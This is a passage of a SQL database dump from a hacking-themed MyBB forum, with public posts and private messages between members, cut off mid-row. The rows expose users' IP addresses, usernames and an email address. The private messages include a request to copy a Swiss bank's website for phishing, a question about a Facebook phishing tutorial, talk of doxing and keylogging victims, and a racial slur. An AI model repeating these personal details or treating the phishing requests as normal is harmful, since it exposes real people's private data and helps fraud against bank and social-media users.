'1bcf3f43714b68e57f7bc6a2569a93a2', '0', '0'); INSERT INTO mybb_posts VALUES('7452', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1352597632', 'Thanks for the help and download.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1228482b605584f56aae51ecb78a9136', '0', '0'); INSERT INTO mybb_posts VALUES('7453', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352597634', '/me tells XxTREYZxX that all members are experiencing it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6ddc84fa7218a801949af1b92ebc44ab', '0', '0'); INSERT INTO mybb_posts VALUES('7454', '1248', '7407', '3', 'RE: Recent Updates', '0', '4', 'Triple H', '1352597674', 'Lol iTzIpod and nice updates. Thanks for informing us.', '72.231.24.165', '1223104677', '1', '0', '4', '1352597695', '1', '268763f4c44ea6acf28424cf8aa55cb9', '0', '1352597695'); INSERT INTO mybb_posts VALUES('7455', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1352597674', 'Granted but then you died. \nI wish I was smart.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'faf1f614060ad27b8a84befd866c072c', '0', '0'); INSERT INTO mybb_posts VALUES('7456', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352597705', 'Looks like I\'ve won again. I love my sexy avatar. <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad17ac427142c86d70ebdfec0edfcd4c', '0', '0'); INSERT INTO mybb_posts VALUES('7458', '1144', '7402', '11', 'RE: What can you do with?', '0', '4', 'Triple H', '1352597811', '[quote=\'sirchamp\' pid=\'7402\' dateline=\'1352575400\']\r\n[quote=\'Triple H\' pid=\'6958\' dateline=\'1351918876\']\r\nYou can DOX them, boot them offline, send them viruses or steal all their keystrokes.\r\n[/quote]\r\n\r\nYou cant send them virues or steal their keystrokes if you have their ip adress lol.\r\n[/quote]\r\n\r\nI think you could do it with Metasploit or cain & abel.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1d11a05fc9a598163ae1fcade206552d', '0', '0'); INSERT INTO mybb_posts VALUES('7459', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352597825', 'I reached 1500 posts. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b30c85519cb88f18b82fcb76ec69e00a', '0', '0'); INSERT INTO mybb_posts VALUES('7467', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352604150', 'Congratz and you made 1k posts under around a month because your awesome.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '772e177ebe79bb89c5102648c6384593', '0', '0'); INSERT INTO mybb_posts VALUES('7461', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1352598065', 'What do you mean?\nLike make it match the forum\'s colors?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d92156fe8729c302e40be08a4cd0a84', '0', '0'); INSERT INTO mybb_posts VALUES('7462', '1251', '0', '3', '[Bug] Award Icons', '0', '82', 'iTzIpod', '1352598124', 'Some of the Award Icons are broken again...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c1094dfd620a38403e4d67916d5db7cf', '0', '0'); INSERT INTO mybb_posts VALUES('7463', '1252', '0', '49', '[Suggestion] Post cooldown', '0', '82', 'iTzIpod', '1352598223', 'Elite members = 10-15 Seconds Cooldown (Current is 30)\r\nNormal members = 20-25 Seconds Cooldown (Current is 30)\r\n\r\nI think this would be a nice addition to the forum by lowering the post cooldowns just by a little bit.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9778bab3142abbe63455967d22632d15', '0', '0'); INSERT INTO mybb_posts VALUES('7464', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1352598257', 'No problem.\nAny way of thanks is appreciated. Enjoy your day.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a803cdb9ae778b958c4012d5c4992ca9', '0', '0'); INSERT INTO mybb_posts VALUES('7468', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352604446', 'I know I am. Thanks t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b0eba3cc3c572dcd85139e18a4c1b49c', '0', '0'); INSERT INTO mybb_posts VALUES('7469', '1247', '7439', '4', 'RE: Hey Everybody!', '0', '342', 'Squirt1971', '1352606030', '[quote=\'XxTREYZxX\' pid=\'7439\' dateline=\'1352594381\']\r\nWelcome to the forums bud, how did you find us.\r\n[/quote]\r\n\r\nThanks, I saw a link on another forums and it looked pretty good so I registered.', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', '6685b1c744d19797e237820689b9c00b', '0', '0'); INSERT INTO mybb_posts VALUES('7470', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '257', 'XxTREYZxX', '1352617817', 'I think this would be a great addition to the site.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '8621c1e08d664c003093910739e5ecd7', '0', '0'); INSERT INTO mybb_posts VALUES('7471', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1352618447', 'why do i keep wining, i won.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '3d2427bfc19823a81af9e206495fa132', '0', '0'); INSERT INTO mybb_posts VALUES('7472', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352618907', 'Banned because your a spammer aah lol', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'dff79e5268dcc8e0a22050574faa7017', '0', '0'); INSERT INTO mybb_posts VALUES('7473', '1235', '7313', '42', 'RE: Marijuana legalized in two US states', '0', '262', 'RAND0M1ZER', '1352619728', 'Wow I\'m really surprised this happened. Does this mean its also now legal to grow? and will there be shops where you can buy it?', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '4c0d190463c8deaf4d4ec00863e8bfba', '0', '0'); INSERT INTO mybb_posts VALUES('7474', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '262', 'RAND0M1ZER', '1352619796', 'I lost my steam account through phishing like 6-7 years ago.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '9f74802ac2c505d1757042be69d838bf', '0', '0'); INSERT INTO mybb_posts VALUES('7475', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '262', 'RAND0M1ZER', '1352619849', 'Yeah whenever I post I get a CloudFlare page, hopefully this is resolved promptly.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '7b76739e05305592de10cbb0566f80cd', '0', '0'); INSERT INTO mybb_posts VALUES('7476', '1248', '7407', '3', 'RE: Recent Updates', '0', '62', 'R?????zo?', '1352620787', 'Where\'s the market place?\nCan\'t find it.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'bd6445b77f60252409d9e500f8bfbf86', '0', '0'); INSERT INTO mybb_posts VALUES('7477', '1248', '7407', '3', 'RE: Recent Updates', '0', '53', 'sirchamp', '1352624893', 'Finally a marketplace section :):)', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '250a748a164ae443350587c0c17bb9b2', '0', '0'); INSERT INTO mybb_posts VALUES('7478', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1352625007', 'I dont think it works for adf.ly. Ill test it right away.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0ac68d83bc8c7a36d4cba739d20e0bed', '0', '0'); INSERT INTO mybb_posts VALUES('7479', '1144', '6706', '11', 'RE: What can you do with?', '0', '53', 'sirchamp', '1352625357', 'Well you need to have open port(s).', '180.98.213.253', '-1268591107', '1', '0', '0', '0', '1', 'ac328e100b69967dc72a568bc30d5ceb', '0', '0'); INSERT INTO mybb_posts VALUES('7480', '1248', '7407', '3', 'RE: Recent Updates', '0', '205', 'mothered', '1352633870', 'I\'ve read the lot, and must say, they\'re pretty good.\r\n\r\nGood to see that the ranking has Improved too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9c8b47b484b9438bce73ee79c99ddf2a', '0', '0'); INSERT INTO mybb_posts VALUES('7481', '1253', '0', '7', 'Who\'s had a Toothache?', '0', '205', 'mothered', '1352634279', 'Greetings LH,\r\n\r\nSo who\'s had a serious toothache, and what were your experiences? And I mean a pretty bad one.\r\n\r\nI chipped my back tooth today, and It was bloody killing me. A few pain killers have settled It, but no doubt, It\'ll flare up again.\r\n\r\nOff to the dentist tomorrow.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b5195436ae0f06984fcbaab43ea12d83', '0', '0'); INSERT INTO mybb_posts VALUES('7482', '1254', '0', '65', 'Who\'s watched The Social Network movie?', '0', '205', 'mothered', '1352634721', 'Greetz everyone,\r\n\r\nAlthough the movie was released In 2010, I never got around to watch The Social Network movie.\r\n\r\nIt\'s playing now In my locality, and I\'m burning It to disc, to watch at a later time. Just want to know whether It\'s worth my while.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ee0b8f0308bcf92e583096e0e5495d31', '0', '0'); INSERT INTO mybb_posts VALUES('7483', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '205', 'mothered', '1352635342', 'Hasn\'t happened yet, and I certainly wish It never does.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '38b30bc3c5e864b676e81f2d656821c5', '0', '0'); INSERT INTO mybb_posts VALUES('7484', '1254', '7482', '65', 'RE: Who\'s watched The Social Network movie?', '0', '228', 'VirtualLegend', '1352642227', 'It\'s a good movie, You should watch it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'aae25272c69f936f22c3e08f6514a4b2', '0', '0'); INSERT INTO mybb_posts VALUES('7485', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '228', 'VirtualLegend', '1352642292', 'Welcome To LH, be sure to stay active and HQ', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'cc0a130c8816afba7fb02a96da3da10c', '0', '0'); INSERT INTO mybb_posts VALUES('7486', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '82', 'iTzIpod', '1352647970', 'Thanks for your feedback. Hoping I can get more opinions.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7edd19bf53bc0346adc98d2edcf64c29', '0', '0'); INSERT INTO mybb_posts VALUES('7487', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352648005', 'No you didn\'t, I won.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e34c970152e810dc5b7020d49fb46a03', '0', '0'); INSERT INTO mybb_posts VALUES('7488', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352648045', 'Banned for not having a period.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '901eb59982e89565176074195d767049', '0', '0'); INSERT INTO mybb_posts VALUES('7489', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352648083', 'Sirchamp, have you ever got paid from Adfoc.us from this method?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d6bdf4bc216db0b823a910f18142200', '0', '0'); INSERT INTO mybb_posts VALUES('7490', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '82', 'iTzIpod', '1352648207', 'I\'ve had a lot of toothaches. It hurt really bad and parts of my teeth are already chipped off by a little. Sometimes, the teeth in the very back of my mouth hurt really bad when I eat and then parts of that back tooth come out of my gums. So then, I just pull it out. :/ Hurts really bad.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '75a81bd97338989ce0fd00b60a809d5b', '0', '0'); INSERT INTO mybb_posts VALUES('7491', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '228', 'VirtualLegend', '1352648554', 'Really Bad idea, \n\nI don\'t know about you guys, but if I\'m on online i don\'t want to wait to post', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'b3655e2b9eb7e65675f67ba11385c261', '0', '0'); INSERT INTO mybb_posts VALUES('7492', '1040', '5986', '61', 'RE: How To Get Passes To Porn Sites', '0', '228', 'VirtualLegend', '1352648872', 'lmao, gonna check it out \n\nDoes it still work', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '4135503f3c635a430c4d10a89a2288f8', '0', '0'); INSERT INTO mybb_posts VALUES('7493', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '53', 'sirchamp', '1352649992', 'I dont think this is necessary. If you make more than one post in 30 seconds I doubt that it is a good and usefull post. These addition would bring more spam posts.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '8414cf701f80cd9155cf95b7227351e0', '0', '0'); INSERT INTO mybb_posts VALUES('7494', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1352651747', 'The last 2 months, not many people were using the method then. But now its overused so I dont think anyone will get paid out.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '92353df76a8e34a6820bcd6596a47d96', '0', '0'); INSERT INTO mybb_posts VALUES('7495', '1255', '0', '4', 'Wasssup?', '0', '345', 'ZetaHunter', '1352654955', '[size=medium]Hu Guys new to here[/size]', '116.203.56.36', '1959475236', '0', '0', '0', '0', '1', '251ce814ed671ddba70b8ea1c5ed455f', '0', '0'); INSERT INTO mybb_posts VALUES('7496', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '228', 'VirtualLegend', '1352655344', 'Never ever had it before, :bigsmile:', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'fbd919fa70f74940759410bf45fa2c1a', '0', '0'); INSERT INTO mybb_posts VALUES('7497', '1255', '7495', '4', 'RE: Wasssup?', '0', '228', 'VirtualLegend', '1352655468', 'Welcome ZetaHunter to LH,\n\nBe sure to check out the rules; http://l33thacking.net/misc.php?action=help&hid=8\nIf you have questions or if you need help just PM me\n\nHave a Nice Stay', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '837b27bceab15377ac86f04b7c418d21', '0', '0'); INSERT INTO mybb_posts VALUES('7498', '1248', '7476', '3', 'RE: Recent Updates', '0', '1', 't3h jok3r', '1352661310', '[quote=\'R?????zo?\' pid=\'7476\' dateline=\'1352620787\']\r\nWhere\'s the market place?\r\nCan\'t find it.\r\n[/quote]\r\n\r\nIt\'s going to be added soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b0ed3e4cdcc017a6f94c42dd6e774a6', '0', '0'); INSERT INTO mybb_posts VALUES('7499', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352661608', 'We had a outdated plugin which I updated. Can someone check and tell if it the issue is resolved or not?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd7c285603ba5fd0a7b28cdef47d2f037', '0', '0'); INSERT INTO mybb_posts VALUES('7500', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '82', 'iTzIpod', '1352661967', 'I think it\'s working good now. :) Thanks t3h jok3r. You can close the thread for now, if any member receives the issue again, they can make a thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bfcb568d2b113274232e2618917d26f3', '0', '0'); INSERT INTO mybb_posts VALUES('7501', '1255', '7495', '4', 'RE: Wasssup?', '0', '82', 'iTzIpod', '1352662013', 'Welcome ZetaHunter! :) This is L33tHacking.\nEnjoy your stay.\nAdd me on Skype if you want.\nSkype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c5da0aee813563a16c5b6a7c6921ddb', '0', '0'); INSERT INTO mybb_posts VALUES('7502', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352662062', 'Thanks for confirming Ipod, lets just wait for one more confirmation then this thread will be closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '646bb928761ad1f8255fa1e55a26b5e2', '0', '0'); INSERT INTO mybb_posts VALUES('7503', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352662075', 'Oh so that explains why Adfoc.us is taking so long to pay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b7621dc2ed63d60d4732f768a939fb8', '0', '0'); INSERT INTO mybb_posts VALUES('7504', '1248', '7407', '3', 'RE: Recent Updates', '0', '82', 'iTzIpod', '1352662110', 'I see you updated the thread informing us about the Cloud Flare issues. It\'s not fixed yet.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0d75fe5bd0350ae46b9b5230b852ffae', '0', '0'); INSERT INTO mybb_posts VALUES('7505', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '82', 'iTzIpod', '1352662182', 'Wait no, I just received one after posting in a different thread. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb98571ea0f3eb14e156164d19faf489', '0', '0'); INSERT INTO mybb_posts VALUES('7506', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352662280', 'Did it use the lock mycode?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7820bcf6eddb786819db75a4903e374a', '0', '0'); INSERT INTO mybb_posts VALUES('7507', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '53', 'sirchamp', '1352662339', 'I still have the error.(25)', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '488304533a00e6e6ffe221985a463c1f', '0', '0'); INSERT INTO mybb_posts VALUES('7508', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '1', 't3h jok3r', '1352662506', 'I gotta get braces that\'s how bad my teeths are.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a1406b11c81bb1a259f5891a2368700', '0', '0'); INSERT INTO mybb_posts VALUES('7509', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352662590', 'Can you guys try to clear your history and cache and try again? I\'m not getting the errors anymore which is weird.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '893e792471f2e185b2098dafd69eac9c', '0', '0'); INSERT INTO mybb_posts VALUES('7510', '1255', '7495', '4', 'RE: Wasssup?', '0', '1', 't3h jok3r', '1352662960', 'Welcome to L33T Hacking. Hope you enjoy your stay.\n\nHow did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '563519423f01e5af1e0226dfdb530165', '0', '0'); INSERT INTO mybb_posts VALUES('7511', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '53', 'sirchamp', '1352663068', 'I have braces. They are a pain but its worth it. Sometimes the wire detaches itself from the brace and stings my gums...thats sore', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f3851765759b086865e37fa1f441424b', '0', '0'); INSERT INTO mybb_posts VALUES('7512', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1352665871', 'Yeah My payment is still on requested', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '655b05f752dd7897e9fafed3faf5b66e', '0', '0'); DROP TABLE IF EXISTS mybb_privatemessages; CREATE TABLE mybb_privatemessages ( pmid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, toid int(10) unsigned NOT NULL, fromid int(10) unsigned NOT NULL, recipients text NOT NULL, folder smallint(5) unsigned DEFAULT '1' NOT NULL, subject varchar(120) NOT NULL, icon smallint(5) unsigned NOT NULL, message text NOT NULL, dateline bigint(30) NOT NULL, deletetime bigint(30) NOT NULL, status int(1) NOT NULL, statustime bigint(30) NOT NULL, includesig int(1) NOT NULL, smilieoff int(1) NOT NULL, receipt int(1) NOT NULL, readtime bigint(30) NOT NULL, PRIMARY KEY (pmid), KEY uid (uid,folder), KEY toid (toid) ); INSERT INTO mybb_privatemessages VALUES('2', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'WASSSUP', '0', 'PENIS IN THE BUTT :P hey', '1340038587', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('5', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: WASSSUP', '0', 'undefined', '1340038729', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('8', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'bitch ass nigga', '0', 'wssup homie', '1340039908', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('31', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Annoying ', '0', '[img]http://speedcap.net/img/59bca508ffd824229b6fffa835ee268d/0faf3859.png[/img]\r\n\r\nHow do I fix it?', '1343925220', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1333', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Congratulations', '0', '[quote=\'t3h jok3r\']\r\nCongratz on becoming Staff NXK. Have a look at our [url=http://l33thacking.com/forumdisplay.php?fid=5]Staff[/url] Forum and have a look at the following threads and try to learn and understand our staff rules & regulations including instructions and moderation actions.\r\n\r\n[b]Useful and recommend threads[/b]\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=10]How to moderate LH[/url]\r\n[url=http://l33thacking.com/showthread.php?tid=331]New Rules and Instructions[/url]\r\n[url=http://l33thacking.com/showthread.php?tid=327]Staff Mycode[/url]\r\n[/quote]\r\n\r\nThanks man. Ill do my best :)', '1346902046', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1329', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', '[quote=\'t3h jok3r\']\r\nI\'m promoted NXK to staff. Couldn\'t talk this out, reasons as follow.\r\n\r\nJakeUS said that he can\'t be staff anymore because of schools but he will be active but not active enough to handle reports in future. iTzIpod is 15- plus as he said that he will be busy with school and he lives outside of US so NXK was the only one left to promote and he even agreed. I can\'t make you a Staff lol. \r\n[/quote]\r\nStaff is better then admin?', '1346900989', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('42', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Members', '0', 'If you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time.\r\n\r\n', '1344297135', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('46', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Members', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\nIf you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time.\r\n\r\n\r\n[/quote]\r\n\r\nThanks, honestly I am looking for advertisers and some good sites to advertise on. How much would he charge without your cut? \r\n\r\nDon\'t worry about your commission. \r\n[/quote]\r\n\r\nI\'m not sure, I will ask him.', '1344369080', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('49', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Members', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\nIf you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time.\r\n\r\n\r\n[/quote]\r\n\r\nThanks, honestly I am looking for advertisers and some good sites to advertise on. How much would he charge without your cut? \r\n\r\nDon\'t worry about your commission. \r\n[/quote]\r\n\r\nI\'m not sure, I will ask him.\r\n[/quote]\r\n\r\nThanks. By the way, how is the new theme? \r\n[/quote]\r\n\r\nI like it better then the old one.\r\n\r\n', '1344369419', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('52', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Members', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\nIf you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time.\r\n\r\n\r\n[/quote]\r\n\r\nThanks, honestly I am looking for advertisers and some good sites to advertise on. How much would he charge without your cut? \r\n\r\nDon\'t worry about your commission. \r\n[/quote]\r\n\r\nI\'m not sure, I will ask him.\r\n[/quote]\r\n\r\nThanks. By the way, how is the new theme? \r\n[/quote]\r\n\r\nI like it better then the old one.\r\n\r\n\r\n[/quote]\r\n\r\nThanks, I\'m still working on it. \r\n[/quote]\r\n\r\nAre you looking for an affiliate banner on the other site advertising this one?', '1344370611', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('58', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\']\r\nYo sup, long time no see. \r\n[/quote]\r\nHey, sorry still on vacation :3 and finally at a place with wifi that works longer then 20 seconds before kicking me off. :/ \r\n\r\nHow have you been?', '1344479123', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('61', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nYo sup, long time no see. \r\n[/quote]\r\nHey, sorry still on vacation :3 and finally at a place with wifi that works longer then 20 seconds before kicking me off. :/ \r\n\r\nHow have you been?\r\n[/quote]\r\n\r\nNo problem, enjoy your vacation.\r\n\r\nI\'m good and you? \r\n[/quote]\r\nGood vacation but I am at a bad moment right now a family member is sick.', '1344571644', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('64', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nYo sup, long time no see. \r\n[/quote]\r\nHey, sorry still on vacation :3 and finally at a place with wifi that works longer then 20 seconds before kicking me off. :/ \r\n\r\nHow have you been?\r\n[/quote]\r\n\r\nNo problem, enjoy your vacation.\r\n\r\nI\'m good and you? \r\n[/quote]\r\nGood vacation but I am at a bad moment right now a family member is sick.\r\n[/quote]\r\n\r\nDamn, get well soon.\r\n\r\nI don\'t know why, but me and my father has caught a flu. \r\n[/quote]\r\nThat sucks and thanks:) \r\n\r\nGet better! ;)', '1344688327', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('66', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey', '0', 'Can you make a paypal account and put 1$ in it? Then tll me the account info?', '1344785246', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('70', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nCan you make a paypal account and put 1$ in it? Then tll me the account info?\r\n[/quote]\r\n\r\nI don\'t get it, why?\r\n\r\nP.S: I\'m really sick and have a high fever, I would like you to please take care of the site for the next two days.\r\n\r\n\r\n[/quote]\r\n\r\nSure also I need it because I have a exploit that I am going to use it with.', '1344821880', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('72', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: So', '0', '[quote=\'t3h jok3r\']\r\nI\'m sick atm and would like you to POST content or at least reply to threads. You are the only staff now because I have now demoted Hil.\r\n[/quote]\r\n\r\nOkay, I will.', '1344827591', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('125', '53', '54', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Question', '0', 'Hey Sin Cara\r\nIm not sure if im allowed to make a tutorial for a facebook phishing page.\r\nSo i wanna ask if i am allowed to do that tutorial.\r\nIm asking this because it said somewhere no blackhat activities ...\r\nThx and regards', '1345056646', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('128', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\']\r\nHi, hope you are liking L33T Hacking so far. If you have any questions, feel free to ask. \r\n[/quote]\r\nyeah its great, i love it\r\ni just want to ask if im allowed to make a facebook phishing website tutorial.\r\nRegards ', '1345059263', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('137', '53', '64', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'phishing', '0', 'can you make a copy of this website ? https://www.postfinance.ch/\r\nmy email : phonomarco@yahoo.de\r\n\r\nthanks alot', '1345112832', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('139', '64', '53', '64', 